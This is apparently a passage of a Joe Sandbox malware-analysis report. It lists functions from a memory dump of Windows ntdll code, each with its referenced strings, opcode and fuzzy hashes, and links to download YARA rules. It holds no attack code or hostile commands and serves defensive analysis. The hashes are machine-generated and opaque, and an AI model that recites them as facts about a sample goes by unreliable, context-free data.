                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$@
                                                              • API String ID: 0-1537733988
                                                              • Opcode ID: 06b768fc1dc8bfa1752d5ffa1c255ec25960aff4457b12de727e5aa3754d3a03
                                                              • Instruction ID: a63f578ddd4dbc4f77725ce6cc8cf890649772e94ca8c2a442e5f01355f40e8b
                                                              • Opcode Fuzzy Hash: 06b768fc1dc8bfa1752d5ffa1c255ec25960aff4457b12de727e5aa3754d3a03
                                                              • Instruction Fuzzy Hash: 9971BF74609301DFE714DF24C980A1BBBFEFF85658F108A1EE49A87291DB71E905CB92
                                                              Function 35A1B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • GlobalizationUserSettings, xrefs: 35A1B834
                                                              • TargetNtPath, xrefs: 35A1B82F
                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 35A1B82A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                              • API String ID: 0-505981995
                                                              • Opcode ID: bde92ca955d7cf9c08e683963a1e05826623937cbd25ef297beea2b49511a5d9
                                                              • Instruction ID: 9014c6119cee783c243ede4184b56411a9ec5a2b732f1082825322178e0d2396
                                                              • Opcode Fuzzy Hash: bde92ca955d7cf9c08e683963a1e05826623937cbd25ef297beea2b49511a5d9
                                                              • Instruction Fuzzy Hash: 47616B7294122DABDB21DF54DC88F9AB7F8AB08750F4101E9AD09A7250DB749F85CF90
                                                              Function 3593F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3599E6C6
                                                              • HEAP[%wZ]: , xrefs: 3599E6A6
                                                              • HEAP: , xrefs: 3599E6B3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                              • API String ID: 0-1340214556
                                                              • Opcode ID: 3360b2a9f956c144afd05239505d7040cba476c47839fd8c173cc949cf438f40
                                                              • Instruction ID: be965e5b16ef393a87cb3490e230ca832b0f9a905e882eaa6e377aa0d78adf10
                                                              • Opcode Fuzzy Hash: 3360b2a9f956c144afd05239505d7040cba476c47839fd8c173cc949cf438f40
                                                              • Instruction Fuzzy Hash: 9B51E475705B84EFE716CBA8C885F9ABBF9FF05344F0404A5E5828B692D778E940CB60
                                                              Function 359615F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpCompleteMapModule, xrefs: 359AA590
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 359AA59A
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 359AA589
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              • Opcode ID: db336da2b8277fcea86abe89b6228d66b28762fec49660283be1e1856d1a81df
                                                              • Instruction ID: 772855118d8c532a67868384e98feddfde7f6945c39342451cbc5057a37618ac
                                                              • Opcode Fuzzy Hash: db336da2b8277fcea86abe89b6228d66b28762fec49660283be1e1856d1a81df
                                                              • Instruction Fuzzy Hash: B15133797047C49FE721CB18C944B0A77F9FF00728F0805A5E9929B2E2DB74E904DB54
                                                              Function 3593758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                              • API String ID: 0-1151232445
                                                              • Opcode ID: a2d1b657445a2cad4b1a3b7f1fd3557eda56ba55839a5cf19349108f37377214
                                                              • Instruction ID: 1a011ebd36babe7597fa0529bccc6e89587112a865614e99b52c8501254f601c
                                                              • Opcode Fuzzy Hash: a2d1b657445a2cad4b1a3b7f1fd3557eda56ba55839a5cf19349108f37377214
                                                              • Instruction Fuzzy Hash: F54128B4305380CFFB29CB1CC992BA977A5EF01358F5444A9D8474B246DB64D986CF52
                                                              Function 359716CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 359B1B39
                                                              • minkernel\ntdll\ldrtls.c, xrefs: 359B1B4A
                                                              • LdrpAllocateTls, xrefs: 359B1B40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                              • API String ID: 0-4274184382
                                                              • Opcode ID: 6335536b7ff11991db9bf0b1e76ebf8ab568fd37bb9826092d0dd0f5bfffdd2e
                                                              • Instruction ID: 6f77482d72c9592a4f27c5736c68120929c8c9ea724153a8c9afdfb58bace908
                                                              • Opcode Fuzzy Hash: 6335536b7ff11991db9bf0b1e76ebf8ab568fd37bb9826092d0dd0f5bfffdd2e
                                                              • Instruction Fuzzy Hash: B141A9B5A04748EFDB15CFA8DC40BAEBBF9FF48714F14815AE406A7211DB74A901EB90
                                                              Function 359F5180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-964947082
                                                              • Opcode ID: 23aae0e932a3c617270f1f773dbb1d34e4295193125c037fa95c34ac560026ec
                                                              • Instruction ID: b006e7ed0329abc57d8c54492c58e96dcf354e62b8daa5eabd4a1f9ba1665baf
                                                              • Opcode Fuzzy Hash: 23aae0e932a3c617270f1f773dbb1d34e4295193125c037fa95c34ac560026ec
                                                              • Instruction Fuzzy Hash: 954109B5619358EFD710CF58D890FAE3BB8FF44359F40415AE9059B241DA32D846DBA0
                                                              Function 359733A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Actx , xrefs: 359733AC
                                                              • RtlCreateActivationContext, xrefs: 359B29F9
                                                              • SXS: %s() passed the empty activation context data, xrefs: 359B29FE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                              • API String ID: 0-859632880
                                                              • Opcode ID: 50de4e2878c757f8f59d3809e0afdaa71104c8e25178f25d7eb11c4753b731ca
                                                              • Instruction ID: 41f42d93ab92c4afe2ec4ecfe4b803068890254c03dae9e3288e2cb6dfaf81aa
                                                              • Opcode Fuzzy Hash: 50de4e2878c757f8f59d3809e0afdaa71104c8e25178f25d7eb11c4753b731ca
                                                              • Instruction Fuzzy Hash: 483142722143059FEF26CE69D880F9A77A8FF48720F41446AED059F286CBB0E841CBD0
                                                              Function 359CB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 359CB670
                                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 359CB632
                                                              • GlobalFlag, xrefs: 359CB68F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                              • API String ID: 0-4192008846
                                                              • Opcode ID: 9ab0a50d40bd5597661bcf0ebcdcb8b53d20d2cd71dedc25d26158584bbb7f39
                                                              • Instruction ID: 9246eadaee455a647eaa362396d971a5b5283ccafb1dd22e53b0b6123cde501b
                                                              • Opcode Fuzzy Hash: 9ab0a50d40bd5597661bcf0ebcdcb8b53d20d2cd71dedc25d26158584bbb7f39
                                                              • Instruction Fuzzy Hash: 23316CB1E40209AFDB01DF94DD80AEEBBBDEF44754F9004A9EA05A7251D734AE04CBA4
                                                              Function 359E13B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                              • API String ID: 0-1050206962
                                                              • Opcode ID: 8bff82a1487ef29e854aabccfc8e535eaa2e8a3d97e47fca753db14a1ad31e90
                                                              • Instruction ID: a5731ab1ab5e2340c700560b56e33c6a50da09367cc19c8968e951d892427d0c
                                                              • Opcode Fuzzy Hash: 8bff82a1487ef29e854aabccfc8e535eaa2e8a3d97e47fca753db14a1ad31e90
                                                              • Instruction Fuzzy Hash: 3C317A7690025DBFEB12DF94CC84EEEFBBDEB44654F410465EA00A7211E738ED449BA0
                                                              Function 35971607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrtls.c, xrefs: 359B1A51
                                                              • LdrpInitializeTls, xrefs: 359B1A47
                                                              • DLL "%wZ" has TLS information at %p, xrefs: 359B1A40
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                              • API String ID: 0-931879808
                                                              • Opcode ID: 3582669d4f2a54b969d5ce0a57e3d02845bc902d7452517e4971c8545555ba99
                                                              • Instruction ID: c250b5e629aa8711750ab86a1714fe7133dccb74ad06a4ce70cd8ff5a04a07b2
                                                              • Opcode Fuzzy Hash: 3582669d4f2a54b969d5ce0a57e3d02845bc902d7452517e4971c8545555ba99
                                                              • Instruction Fuzzy Hash: A931E271A14345ABEB21CB5CCC45F9A77BDBF88798F05016AE900B7190DBB0BD42A7A4
                                                              Function 35981270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 3598127B
                                                              • BuildLabEx, xrefs: 3598130F
                                                              • @, xrefs: 359812A5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                              • API String ID: 0-3051831665
                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction ID: 561334df34da604a7e8c96acef98cfa1f468d0f1f48ef97467645c53d9b05af8
                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                              • Instruction Fuzzy Hash: 3531AD72A0021DBBDF12DF95CD44EEEBBBDEB84750F004426E914A7261E770EA059BA0
                                                              Function 359374B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: RtlValidateHeap
                                                              • API String ID: 3446177414-1797218451
                                                              • Opcode ID: 777b6503257946e54bfabbec0792c6f534b962c52d5123841ea16d1d056679f0
                                                              • Instruction ID: 21da427ad8ee378194bf24722bfbe57875b5eec2c9bf2e9459c2f57c9b20cbcf
                                                              • Opcode Fuzzy Hash: 777b6503257946e54bfabbec0792c6f534b962c52d5123841ea16d1d056679f0
                                                              • Instruction Fuzzy Hash: 2A41F576B05345DFDB0ACFA4C890BADBBB6FF45254F04825DD8166B281CB34AA05DF90
                                                              Function 359E705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: kLsE
                                                              • API String ID: 3446177414-3058123920
                                                              • Opcode ID: c77bbf132a037620ad5bf6b0127f9b2a76229c4b316be8e5f05b5100c397168e
                                                              • Instruction ID: e9e803d7d8820fb1437f557ab326500b458058527b5b7be4ee61557d5746117d
                                                              • Opcode Fuzzy Hash: c77bbf132a037620ad5bf6b0127f9b2a76229c4b316be8e5f05b5100c397168e
                                                              • Instruction Fuzzy Hash: 28413AB162939146E752DF68ED44B6D3BA4F7407ACF100169EC51AB0C1CF745483E7E2
                                                              Function 359552A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@
                                                              • API String ID: 0-149943524
                                                              • Opcode ID: 549bf8cfbbd32ceae6299603fd6fdb5a3a88238fa304d4be5f7e9cbc51c03571
                                                              • Instruction ID: ea0667354a606217114fbfb707be4ae933cc8e4ee8e05c082ef3bcb7a11dd54d
                                                              • Opcode Fuzzy Hash: 549bf8cfbbd32ceae6299603fd6fdb5a3a88238fa304d4be5f7e9cbc51c03571
                                                              • Instruction Fuzzy Hash: D332C0B96083518BD724CF14C480B2EB7F5FF84764F50492EF9858B2A1E774D864CBA2
                                                              Function 35945702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 3078533e5bf6883af8f6832e33bcec86c2c5d9a66b69bf7f52946bac10225e58
                                                              • Instruction ID: 0b48ec151623ccea2ce3c419bca95403953ba478eade92b1b1b9ce0598c7babb
                                                              • Opcode Fuzzy Hash: 3078533e5bf6883af8f6832e33bcec86c2c5d9a66b69bf7f52946bac10225e58
                                                              • Instruction Fuzzy Hash: E531CD75701B06EFE755CF64CA80E8ABBBABF48354F044025E80557A51EBB4BC21DBD0
                                                              Function 359D5DA0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Log$RXACT
                                                              • API String ID: 0-2401810139
                                                              • Opcode ID: fb3086d09256fcc262fe55f5e9fd46c10b0988a7e621a5ce71a0ffc71e4c7c2b
                                                              • Instruction ID: dae52c531447b9b57e5640acb409ca140838a5735598b6e0e5b0cbbe97280143
                                                              • Opcode Fuzzy Hash: fb3086d09256fcc262fe55f5e9fd46c10b0988a7e621a5ce71a0ffc71e4c7c2b
                                                              • Instruction Fuzzy Hash: 84713871208345AFE712DF54C980E6BBBEDFB88754F048929F54497221DB75ED088BA2
                                                              Function 3595F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$
                                                              • API String ID: 3446177414-233714265
                                                              • Opcode ID: 9518b09b39829cc49246221bd06ca1301eb0bfcce137e1a00aacb788b69777b0
                                                              • Instruction ID: 5568c0282889dc1ef0d752ad338dd60fc008bcce12f5f0541b16d3abe777b443
                                                              • Opcode Fuzzy Hash: 9518b09b39829cc49246221bd06ca1301eb0bfcce137e1a00aacb788b69777b0
                                                              • Instruction Fuzzy Hash: D361F1B5A04749DFEB20CFA8C580B9DB7B6FF04328F104869D5066B681DB78B995CB90
                                                              Function 359D35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                              • API String ID: 0-118005554
                                                              • Opcode ID: a928529e56d029bb7783572ecabbc3e9e10544e420e59f2aa21966b33410e68a
                                                              • Instruction ID: 5bb9b64b855c116ccad1b2ddebe3f0eadbc26f0bde77d7352c6f6126972f330a
                                                              • Opcode Fuzzy Hash: a928529e56d029bb7783572ecabbc3e9e10544e420e59f2aa21966b33410e68a
                                                              • Instruction Fuzzy Hash: 15310B7520C3819BD301CF29D845B1AB3F8FF89350F804869F8418B381EB32E901CBA2
                                                              Function 3597329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local\$@
                                                              • API String ID: 0-380025441
                                                              • Opcode ID: 6bb33c98bf627c6a0f2d7c9c0839e4253fa05ef65f7f2eb6a9bbb53307784306
                                                              • Instruction ID: 5af0987b7d088e67e8a30723a80f02182f83b6449fd1844299e4d9488b869746
                                                              • Opcode Fuzzy Hash: 6bb33c98bf627c6a0f2d7c9c0839e4253fa05ef65f7f2eb6a9bbb53307784306
                                                              • Instruction Fuzzy Hash: 1D316FB6609304DFD321CF28C880A5BBBF8FF89694F80092EF99487251DA35DD058B92
                                                              Function 359734B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 359B2A95
                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 359B2A90
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                              • API String ID: 0-2653619699
